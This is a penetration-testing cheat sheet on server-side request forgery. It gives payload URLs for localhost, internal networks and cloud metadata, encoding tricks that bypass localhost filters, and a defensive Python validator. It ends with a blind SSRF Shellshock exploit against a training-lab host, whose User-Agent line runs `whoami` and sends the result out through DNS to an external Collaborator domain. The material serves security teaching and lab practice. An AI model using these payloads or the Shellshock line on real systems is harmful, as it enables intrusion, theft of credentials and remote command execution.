# Server-Side Request Forgery (SSRF)

SSRF is a vulnerability in which an attacker induces the server-side application to make HTTP requests to an unintended destination, typically internal systems or the server itself. It arises when the server fetches user-supplied URLs or IP addresses without proper validation.

Common exploitation paths:

* Accessing Cloud metadata
* Leaking files on the server
* Network discovery and port scanning of the internal network through the SSRF
* Sending requests to specific services on the internal network, usually to achieve remote command execution on another server

## **Identify Potential SSRF Entry Points**

🔍 Look for parameters, headers, and input fields that accept URLs:

* URL parameters (`?url=`, `?link=`, `?redirect=`, `?callback=`, `?next=`, etc.)
* JSON / XML body (`"image": "http://example.com/img.jpg"`)
* Headers (`Referer`, `X-Forwarded-For`, `Host`, etc.)
* Hidden form fields (`<input type="hidden" name="webhook_url" value="http://example.com/webhook">`)
* Redirect behavior of any function, parameter or field that forwards the user to a URL
* OAuth / API integrations that retrieve external resources

## **Common SSRF Payloads**

```sh
#Using localhost
http://localhost:80
http://localhost:80/admin
http://localhost:22
https://localhost:443

#Using 127.0.0.1
http://127.0.0.1:80
http://127.0.0.1:22
https://127.0.0.1:443

#Using 0.0.0.0
http://0.0.0.0:80
http://0.0.0.0:22
https://0.0.0.0:443

#Alternative Schemes:
file:// (Read local files)
dict:// (Interacting with dict service)
ftp://, gopher://, sftp:// (Bypass HTTP filters)

#Fetch EC2 metadata
http://169.254.169.254/latest/meta-data/
```

## Enumerate internal network via SSRF

```
http://192.168.0.x/admin
http://172.16.1.x/admin
http://10.10.x.x:80
```

## Bypass Localhost Filters on SSRF

```sh
#Encode at least one character two/three times and send the request
http://127.0.0.1/%61dmin #<- a is encoded
http://127.0.0.1/%2561dmin
http://127.1/%61dmin
http://127.1/%2561dmin

#Encode the (#) more than once and try to use credentials in the URL
http://username@stock.weliketoshop.net/
http://username#@stock.weliketoshop.net/
http://127.0.0.1%25%32%33@stock.weliketoshop.net/admin/delete?username=carlos

#Obfuscation & Encoding:
http://127.0.0.1 → http://2130706433 (Decimal IP)
http://127.0.0.1 → http://0x7f000001 (Hexadecimal)
http://127.0.0.1 → http://127.1 (Shortened IP)
```

{% embed url="https://www.ipaddressguide.com/ip" %}
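On the defending side, the obfuscated spellings above only work against filters that compare URL strings. The following Python validator is an added example, not code from the original page: it canonicalises numeric hosts before deciding, so `2130706433`, `0x7f000001`, `127.1`, `0.0.0.0`, `[::ffff:127.0.0.1]` and the metadata address are rejected exactly like `127.0.0.1`, rejects non-HTTP schemes and URLs carrying userinfo, and resolves names through an injectable `resolver` (an assumption of this example, so it can be tested offline with stub addresses).

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}  # drops file://, dict://, gopher://, ftp://

def parse_numeric_host(host):
    """Canonicalise the numeric spellings listed above (127.1, 2130706433,
    0x7f000001, 0.0.0.0, ::ffff:127.0.0.1); None means a DNS name."""
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        try:  # inet_aton understands the shortened, decimal and hex forms
            return ipaddress.IPv4Address(socket.inet_aton(host))
        except OSError:
            return None

def is_internal(ip):  # any address a server-side fetch must never reach
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped  # [::ffff:127.0.0.1] is loopback in disguise
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_unspecified or ip.is_reserved or ip.is_multicast)

def default_resolver(hostname):
    return sorted({r[4][0] for r in socket.getaddrinfo(hostname, None)})

def check_fetch_target(url, resolver=default_resolver):
    """Return (allowed, reason). `resolver` is an assumption of this example
    so tests run offline. Connect to the IP returned here instead of
    re-resolving the name, or a changing DNS answer defeats the check."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    if parts.username is not None or parts.password is not None:
        return False, "userinfo in URL (parser-confusion trick)"
    host = parts.hostname
    if not host:
        return False, "no host"
    ip = parse_numeric_host(host)
    try:
        addrs = [ip] if ip is not None else [ipaddress.ip_address(a) for a in resolver(host)]
    except (OSError, ValueError):
        addrs = []
    if not addrs:
        return False, f"cannot resolve {host!r}"
    for a in addrs:  # every answer must be external, not just the first
        if is_internal(a):
            return False, f"{host} -> {a} is internal"
    return True, f"{host} -> {addrs[0]}"
```

The check is only as good as the fetch that follows it: the HTTP client must connect to the validated address and must not follow redirects to an unvalidated one.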

## Blind SSRF with Shellshock exploitation

Burp Suite detection via the **Collaborator Everywhere** extension (Burp Suite Pro)


**Manual testing: inject Collaborator payloads into the headers of every request you send:**

```
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@wuumc5cpduoqzh107t5wppfif9l1ip7.oastify.
Referer: http://t82jq2qmrr2ndefxlqjt3mtft6zyrmg.oastify.com/ref
X-Originating-IP: spoofed.4v0udddxe2py0p288164qxgqghm8nwc.oastify.com
Client-IP: spoofed.176rpapuqz1vcme5kyi12usnsey50tp.oastify.com
X-Real-IP: spoofed.ufdkx3xnys9okfmysrquan0g076y9my.oastify.com
X-Wap-Profile: http://spli717l8qjmudww2p0sklaea5gwkk9.oastify.com/wap.xml
X-Forwarded-For: spoofed.w52mn5npouzqahc0itgw0pqiq9w01oq.oastify.com
True-Client-IP: spoofed.i0j8iribjguc537mdfbivbl4lvrnhb6.oastify.com
CF-Connecting_IP: spoofed.ei040n071cc8nzpivbted7303r9j07p.oastify.com
From: root@ek242n273ce8pzrixbvef7505rbj47t.oastify.com
X-Client-IP: spoofed.ffy5xox8yd99k0mjscqfa8010s6k08p.oastify.com
Forwarded: for=spoofed.ophe7x7h8mjiu9ws2l0okhaaa1gtbh0.oastify.com;by=spoofed.ophe7x7h8mjiu9ws2l0okhaaa1gtbh0.oastify.com;host=spoofed.ophe7x7h8mjiu9ws2l0okhaaa1gtbh0.oastify.com
Contact: root@1dfrvavuwz7vimk5qyo18uynye460up.oastify.com
```

**Exploit:**

```
GET /product?productId=2 HTTP/2
Host: 0ae1005304d447f3ed42f58400070006.web-security-academy.net
User-Agent: () { :; }; /usr/bin/nslookup $(whoami).k1m0koo7mr2o2l4qe4zig77g278ywokd.oastify.com
Referer: http://192.168.0.X:8080
```

{% embed url="https://github.com/portswigger/collaborator-everywhere" %}
